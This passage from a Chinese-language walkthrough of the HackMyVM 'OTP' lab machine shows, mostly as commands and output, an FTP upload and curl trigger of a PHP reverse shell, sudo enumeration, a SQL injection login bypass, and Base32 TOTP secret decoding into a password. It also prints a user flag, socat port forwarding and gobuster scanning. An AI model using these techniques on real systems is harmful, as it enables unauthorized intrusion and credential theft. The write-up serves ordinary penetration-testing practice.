login.php\n-rw-r--r--    1 0        0            1280 Feb 05  2020 package.json\n-rw-r--r--    1 0        0           19070 Nov 22  2021 profile.html\n-rw-r--r--    1 0        0           50995 Nov 22  2021 tables.html\ndrwxrwxrwx    2 0        1001         4096 Nov 23  2021 u9l04d_\n226 Directory send OK.\nftp&gt; put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||60528|)\n553 Could not create file.\nftp&gt; cd u9l04d_\n250 Directory successfully changed.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||42817|)\n150 Here comes the directory listing.\ndrwxrwxrwx    2 0        1001         4096 Nov 23  2021 .\ndrwxr-xr-x    5 0        0            4096 Nov 23  2021 ..\n226 Directory send OK.\nftp&gt; put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||8011|)\n150 Ok to send data.\n100% |***************************************************************************************************************************************|  3911       14.07 MiB\/s    00:00 ETA\n226 Transfer complete.\n3911 bytes sent in 00:00 (723.63 KiB\/s)\nftp&gt; exit\n221 Goodbye.<\/code><\/pre>\n<p>\u4e0a\u4f20\u4e86\u4e00\u4e2a\u53cd\u5f39shell\uff01\u5c1d\u8bd5\u6fc0\u6d3b\uff1a<\/p>\n<pre><code class=\"language-bash\">curl http:\/\/argon.otp.hmv\/u9l04d_\/revshell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817531.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817531.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712162423204\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<pre><code class=\"language-bash\">(remote) www-data@otp:\/$ sudo -l\nMatching Defaults entries for www-data on otp:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on otp:\n    (!avijneyam) NOPASSWD: \/bin\/bash\n(remote) www-data@otp:\/$ sudo -u !avijneyam \/bin\/bash\nbash: !avijneyam: event not found\n(remote) www-data@otp:\/$ cat \/etc\/passwd | grep &quot;\/bin\/??sh&quot;\n(remote) www-data@otp:\/$ cat \/etc\/passwd | grep &quot;\/bin\/bash&quot;\nroot:x:0:0:root:\/root:\/bin\/bash\navijneyam:x:1000:1000:Avijneyam,,,:\/home\/avijneyam:\/bin\/bash\ndavid:x:1001:1001::\/srv\/ftp:\/bin\/bash\n(remote) www-data@otp:\/$ sudo -u root \/bin\/bash\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@otp:\/$ sudo -u david \/bin\/bash\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@otp:\/$ sudo -u avijneyam \/bin\/bash\n\nWe trust you have received the usual lecture from the local System\nAdministrator. 
It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required<\/code><\/pre>\n<p>\u53d1\u73b0\u4e0d\u662f\u6211\u60f3\u7684\u90a3\u6837\uff0c\u6240\u6709\u7684\u90fd\u767b\u4e0d\u4e0a\u53bb\uff1a<code>!avijneyam<\/code> \u5148\u88ab bash \u5f53\u6210\u5386\u53f2\u6269\u5c55\uff08event not found\uff09\uff0c\u800c sudoers \u91cc\u7684 <code>(!avijneyam)<\/code> \u53ea\u6709\u5426\u5b9a\u9879\u3001\u6ca1\u6709 <code>ALL<\/code> \u4e4b\u7c7b\u7684\u6b63\u5411\u5339\u914d\uff0c\u770b\u8d77\u6765\u5339\u914d\u4e0d\u5230\u4efb\u4f55\u76ee\u6807\u7528\u6237\uff0c\u6240\u4ee5\u6bcf\u4e2a <code>sudo -u<\/code> \u90fd\u8981\u5bc6\u7801\u3002\u518d\u7ffb\u7ffb\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@otp:\/$ cd ~\n(remote) www-data@otp:\/var\/www$ ls -la\ntotal 16\ndrwxr-xr-x  4 root root 4096 Nov 22  2021 .\ndrwxr-xr-x 12 root root 4096 Nov 17  2021 ..\ndrwxr-xr-x  2 root root 4096 Nov 23  2021 html\ndrwxr-xr-x  4 root root 4096 Nov 19  2021 otp\n(remote) www-data@otp:\/var\/www$ cd otp\n(remote) www-data@otp:\/var\/www\/otp$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Nov 19  2021 .\ndrwxr-xr-x 4 root root 4096 Nov 22  2021 ..\ndrwxr-xr-x 5 root root 4096 Nov 23  2021 argon\ndrwxr-x--x 2 root root 4096 Nov 23  2021 totp\n(remote) www-data@otp:\/var\/www\/otp$ cd totp\n(remote) www-data@otp:\/var\/www\/otp\/totp$ cat \/etc\/hosts\n127.0.0.1       localhost\n127.0.1.1       otp\n127.0.0.1       otp.hmv\n\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n(remote) www-data@otp:\/var\/www\/otp\/totp$ grep -ra &quot;totp&quot; \/etc\/apache2\n\/etc\/apache2\/sites-available\/totp.conf: ServerName totp.otp.hmv\n\/etc\/apache2\/sites-available\/totp.conf: DocumentRoot \/var\/www\/otp\/totp\n(remote) www-data@otp:\/var\/www\/otp\/totp$ cat \/etc\/apache2\/sites-available\/totp.conf \n&lt;VirtualHost *:80&gt;\n        # The ServerName directive sets the request scheme, hostname and port that\n        # the server uses to identify itself. This is used when creating\n        # redirection URLs. 
In the context of virtual hosts, the ServerName\n        # specifies what hostname must appear in the request&#039;s Host: header to\n        # match this virtual host. For the default virtual host (this file) this\n        # value is not decisive as it is used as a last resort host regardless.\n        # However, you must set it for any further virtual host explicitly.\n        ServerName totp.otp.hmv\n\n        #ServerAdmin webmaster@localhost\n        DocumentRoot \/var\/www\/otp\/totp\n        ErrorLog ${APACHE_LOG_DIR}\/error.log\n        CustomLog ${APACHE_LOG_DIR}\/access.log combined\n\n        # For most configuration files from conf-available\/, which are\n        # enabled or disabled at a global level, it is possible to\n        # include a line for only one particular virtual host. For example the\n        # following line enables the CGI configuration for this host only\n        # after it has been globally disabled with &quot;a2disconf&quot;.\n        #Include conf-available\/serve-cgi-bin.conf\n&lt;\/VirtualHost&gt;\n\n# vim: syntax=apache ts=4 sw=4 sts=4 sr noet<\/code><\/pre>\n<h3>\u6539hosts\u518d\u6b21\u8bbf\u95ee<\/h3>\n<pre><code class=\"language-bash\">192.168.0.107   totp.otp.hmv<\/code><\/pre>\n<p>\u518d\u6b21\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817532.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817532.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20240712164048501\" style=\"zoom: 25%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u662f\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\uff1a<code>1&#039; or &#039;1&#039; = &#039;1<\/code>\uff0c\u53d1\u73b0\u8fdb\u6765\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817533.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817533.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712164136255\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u6ca1\u4e1c\u897f\uff0c\u5c1d\u8bd5\u6ce8\u5165\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817534.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817534.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712164615302\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff1a<\/p>\n<pre><code 
class=\"language-bash\">avijneyam:*******************___Cuz_HackMyVM_iS_theRe_Only_4_y0u_:)\n\nAdroit\\nAgain\\nAlzheimer\\nAttack\\nBah\\nBaseME\\nBeloved\\nBlackWidow\\nBrain\\nBreakout\\nBroken\\nBunny\\nCelebritySoup\\nCeres\\nChoc\\nChronos\\nClover\\nCondor\\nConfusion\\nConnection\\nController\\nCrossroads\\nDance\\nDeba\\nDemons\\nDevguru\\nDiophante\\nDoc\\nDominator\\nDoubletrouble\\nDriftingblues3\\nDriftingblues5\\nDriftingblues6\\nDriftingblues7\\nDriftingblues8\\nDriftingblues9\\nDrippingblues\\nEchoed\\nEighty\\nEmma\\nEyes\\nFamily\\nFamily2\\nFaust\\nFive\\nFlower\\nForbidden\\nGift\\nGigachad\\nGinger\\nGovernment\\nGrotesque\\nGrotesque2\\nGrotesque3\\nHacked\\nHash\\nHat\\nHelium\\nHidden\\nHomage\\nHommie\\nHopper\\nHundred\\nIcarus\\nInsomnia\\nIsengard\\nKeys\\nKlim\\nLearn2Code\\nLevel\\nLight\\nLisa\\nListen\\nLocker\\nLupinone\\nMay\\nMemories\\nMessedUP\\nMethod\\nMilk\\nMomentum\\nMomentum2\\nMoosage\\nNarcos\\nNeobank\\nNightfall\\nNoob\\nNowords\\nNumber\\nOrasi\\nOtte\\nPickle\\nPwned\\nRandom\\nRipper\\nRubies\\nSatori\\nSedem\\nServe\\nShop\\nSoul\\nSpeed\\nStagiaire\\nStars\\nsuidy\\nSuidyRevenge\\nSuperhuman\\nSuuk\\nSysadmin\\nT800\\nTalk\\nTaurus\\nTexte\\nTheFool\\nTitan\\nTom\\nTornado\\nTranquil\\nTron\\nTroya\\nTwisted\\nUnbakedPie\\nVideoclub\\nVisions\\nVulny\\nWarez\\nWebmaster\\nWinter\\nZday\\nZen<\/code><\/pre>\n<p>\u5f97\u5230\u4e00\u4e2a\u7591\u4f3c\u5bc6\u7801\u4ee5\u53ca\u5b57\u5178\uff0c\u8fd9\u4e2a\u9875\u9762\u5c31\u6ca1\u5176\u4ed6\u4e1c\u897f\u4e86\uff0c\u7ee7\u7eed\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@otp:\/home$ cd \/srv\/ftp\n(remote) www-data@otp:\/srv\/ftp$ ls -la\ntotal 12\ndrwxr-xrwx 2 root  ftp   4096 Nov 22  2021 .\ndrwxr-xr-x 3 root  root  4096 Nov 19  2021 ..\n-rw-r--r-- 1 david david  125 Nov 19  2021 important_note.txt\n(remote) www-data@otp:\/srv\/ftp$ cat important_note.txt \n&quot;Many times, the idea we come up with is not to fit for the current times 
but if launched at the right time can do wonders.&quot;\n(remote) www-data@otp:\/srv\/ftp$ cd \/\n(remote) www-data@otp:\/$ ls -la\ntotal 68\ndrwxr-xr-x  18 root root  4096 Nov 17  2021 .\ndrwxr-xr-x  18 root root  4096 Nov 17  2021 ..\nlrwxrwxrwx   1 root root     7 Nov 17  2021 bin -&gt; usr\/bin\ndrwxr-xr-x   3 root root  4096 Nov 17  2021 boot\ndrwxr-xr-x  17 root root  3140 Jul 12 03:03 dev\ndrwxr-xr-x  74 root root  4096 Jul 12 03:03 etc\ndrwxr-xr-x   3 root root  4096 Nov 17  2021 home\nlrwxrwxrwx   1 root root    30 Nov 17  2021 initrd.img -&gt; boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx   1 root root    30 Nov 17  2021 initrd.img.old -&gt; boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx   1 root root     7 Nov 17  2021 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root     9 Nov 17  2021 lib32 -&gt; usr\/lib32\nlrwxrwxrwx   1 root root     9 Nov 17  2021 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root root    10 Nov 17  2021 libx32 -&gt; usr\/libx32\ndrwx------   2 root root 16384 Nov 17  2021 lost+found\ndrwxr-xr-x   3 root root  4096 Nov 17  2021 media\ndrwxr-xr-x   2 root root  4096 Nov 17  2021 mnt\ndrwxr-xr-x   2 root root  4096 Nov 23  2021 opt\ndr-xr-xr-x 155 root root     0 Jul 12 03:03 proc\ndrwx------   2 root root  4096 Nov 23  2021 root\ndrwxr-xr-x  20 root root   540 Jul 12 03:03 run\nlrwxrwxrwx   1 root root     8 Nov 17  2021 sbin -&gt; usr\/sbin\ndrwxr-xr-x   3 root root  4096 Nov 19  2021 srv\ndr-xr-xr-x  13 root root     0 Jul 12 03:03 sys\ndrwxrwxrwt   2 root root  4096 Jul 12 03:03 tmp\ndrwxr-xr-x  14 root root  4096 Nov 17  2021 usr\ndrwxr-xr-x  12 root root  4096 Nov 17  2021 var\nlrwxrwxrwx   1 root root    27 Nov 17  2021 vmlinuz -&gt; boot\/vmlinuz-5.10.0-9-amd64\nlrwxrwxrwx   1 root root    27 Nov 17  2021 vmlinuz.old -&gt; boot\/vmlinuz-5.10.0-9-amd64\n(remote) www-data@otp:\/$ cd opt\n(remote) www-data@otp:\/opt$ ls -la\ntotal 16\ndrwxr-xr-x  2 root     root     4096 Nov 23  2021 .\ndrwxr-xr-x 18 root     root     4096 Nov 17  2021 
..\n-r--------  1 www-data www-data 2022 Nov 22  2021 creds.sql\n-r--------  1 www-data www-data   36 Nov 23  2021 note4david.txt\n(remote) www-data@otp:\/opt$ cat note4david.txt \nYour work has done you can rest now\n(remote) www-data@otp:\/opt$ cat creds.sql \n-- MariaDB dump 10.19  Distrib 10.5.12-MariaDB, for debian-linux-gnu (x86_64)\n--\n-- Host: localhost    Database: otp\n-- ------------------------------------------------------\n-- Server version       10.5.12-MariaDB-0+deb11u1\n\n\/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION *\/;\n\/*!40101 SET NAMES utf8mb4 *\/;\n\/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE *\/;\n\/*!40103 SET TIME_ZONE=&#039;+00:00&#039; *\/;\n\/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 *\/;\n\/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 *\/;\n\/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE=&#039;NO_AUTO_VALUE_ON_ZERO&#039; *\/;\n\/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 *\/;\n\n--\n-- Table structure for table `creds`\n--\n\nDROP TABLE IF EXISTS `creds`;\n\/*!40101 SET @saved_cs_client     = @@character_set_client *\/;\n\/*!40101 SET character_set_client = utf8 *\/;\nCREATE TABLE `creds` (\n  `id` int(11) NOT NULL AUTO_INCREMENT,\n  `username` varchar(255) NOT NULL,\n  `password` varchar(255) NOT NULL,\n  `totp` varchar(255) NOT NULL,\n  PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4;\n\/*!40101 SET character_set_client = @saved_cs_client *\/;\n\n--\n-- Dumping data for table `creds`\n--\n\nLOCK TABLES `creds` WRITE;\n\/*!40000 ALTER TABLE `creds` DISABLE KEYS *\/;\nINSERT INTO `creds` VALUES (1,&#039;&#039;,&#039;&#039;,&#039;NYZXMM3SI4YG43RUI4QXMM3ZGBKXKUAK&#039;);\n\/*!40000 ALTER TABLE `creds` ENABLE KEYS *\/;\nUNLOCK TABLES;\n\/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE *\/;\n\n\/*!40101 
SET SQL_MODE=@OLD_SQL_MODE *\/;\n\/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS *\/;\n\/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS *\/;\n\/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION *\/;\n\/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES *\/;\n\n-- Dump completed on 2021-11-20 10:46:17<\/code><\/pre>\n<p>\u627e\u5230\u4e00\u4e2a\u7ecf\u8fc7Base32\u7f16\u7801\u7684\u5bc6\u94a5\uff08\u5e76\u975e\u52a0\u5bc6\uff09\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>cyberchef<\/code>\u8fdb\u884c\u89e3\u7801\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817535.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817535.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712165635560\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">NYZXMM3SI4YG43RUI4QXMM3ZGBKXKUAK\nn3v3rG0nn4G!v3y0UuP<\/code><\/pre>\n<p>\u548c\u524d\u9762\u7684\u5bc6\u7801\u8054\u60f3\u7ec4\u5408\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-text\">          n3v3rG0nn4G!v3y0UuP\navijneyam:*******************___Cuz_HackMyVM_iS_theRe_Only_4_y0u_:)\navijneyam:n3v3rG0nn4G!v3y0UuP___Cuz_HackMyVM_iS_theRe_Only_4_y0u_:)<\/code><\/pre>\n<p>\u521a\u597d\u6ee1\u8db3\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817536.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817536.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712165946835\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h3>\u7aef\u53e3\u8f6c\u53d1<\/h3>\n<pre><code class=\"language-bash\">avijneyam@otp:~$ sudo -l\n[sudo] password for avijneyam: \nMatching Defaults entries for avijneyam on otp:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser avijneyam may run the following commands on otp:\n    (root) PASSWD: \/bin\/bash \/root\/localhost.sh\navijneyam@otp:~$ ls -la\ntotal 20\ndrwx------ 2 avijneyam avijneyam 4096 Nov 22  2021 .\ndrwxr-xr-x 3 root      root      4096 Nov 17  2021 ..\nlrwxrwxrwx 1 root      root         9 Nov 22  2021 .bash_history -&gt; \/dev\/null\n-rwx------ 1 avijneyam avijneyam 3526 Nov 17  2021 .bashrc\n-rw------- 1 avijneyam avijneyam   33 Nov 22  2021 flag_user.txt\n-rwx------ 1 avijneyam avijneyam  807 Nov 17  2021 .profile\navijneyam@otp:~$ cat flag_user.txt \n2990aa5108d5803f3fdca99c277ba352\navijneyam@otp:~$ sudo -u root \/bin\/bash \/root\/localhost.sh\n * Environment: production\n   WARNING: This is a development server. 
Do not use it in a production deployment.\n   Use a production WSGI server instead.\n * Debug mode: off\n * Running on http:\/\/127.0.0.1:5000\/ (Press CTRL+C to quit)<\/code><\/pre>\n<p>\u5f00\u542f\u4e86\u4e00\u4e2a\u7aef\u53e3\u670d\u52a1\uff0c\u4f46\u662f\u7531\u4e8e\u5b83\u53ea\u76d1\u542c<code>127.0.0.1<\/code>\uff0c\u6240\u4ee5kali\u8bbf\u95ee\u4e0d\u5230\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7aef\u53e3\u8f6c\u53d1\uff0c\u5229\u7528\u524d\u51e0\u5929\u5728<code>pwn.college<\/code>\u5b66\u5230\u7684\uff0c<code>ctrl+z<\/code>\u5148\u6302\u8d77\u8fdb\u7a0b\uff0c\u8fdb\u884c\u8f6c\u53d1\uff0c\u518d\u6062\u590d\u8fdb\u7a0b\uff1a<\/p>\n<pre><code class=\"language-bash\">avijneyam@otp:~$ sudo -u root \/bin\/bash \/root\/localhost.sh\n * Environment: production\n   WARNING: This is a development server. Do not use it in a production deployment.\n   Use a production WSGI server instead.\n * Debug mode: off\n * Running on http:\/\/127.0.0.1:5000\/ (Press CTRL+C to quit)\n^Z\n[1]+  Stopped                 sudo -u root \/bin\/bash \/root\/localhost.sh\navijneyam@otp:~$ socat tcp-listen:1234,fork tcp:127.0.0.1:5000 &amp;\n[2] 2553724\navijneyam@otp:~$ fg\nsudo -u root \/bin\/bash \/root\/localhost.sh<\/code><\/pre>\n<h3>\u4e0a\u4f20\u6d4b\u8bd5<\/h3>\n<p>\u73b0\u5728\u770b\u4e00\u4e0b\u80fd\u5426\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817538.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817538.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712170748517\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u6d4b\u8bd5\u4e00\u4e0b\u5e38\u89c4\u7684\u4e0a\u4f20\u65b9\u6cd5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl -X POST http:\/\/$IP:1234\/                 \n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN&quot;&gt;\n&lt;title&gt;405 Method Not Allowed&lt;\/title&gt;\n&lt;h1&gt;Method Not Allowed&lt;\/h1&gt;\n&lt;p&gt;The method is not allowed for the requested URL.&lt;\/p&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl -X PUT http:\/\/$IP:1234\/\n{&quot;message&quot;:&quot;Provide command in JSON request!&quot;,&quot;success&quot;:false}<\/code><\/pre>\n<p>\u53d1\u73b0\u91c7\u7528<code>put<\/code>\u4e0a\u4f20<code>json<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u76ee\u5f55\u641c\u96c6\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP:1234 -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n\/SourceCode           (Status: 200) [Size: 1216]<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code>\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl http:\/\/$IP:1234\/SourceCode 
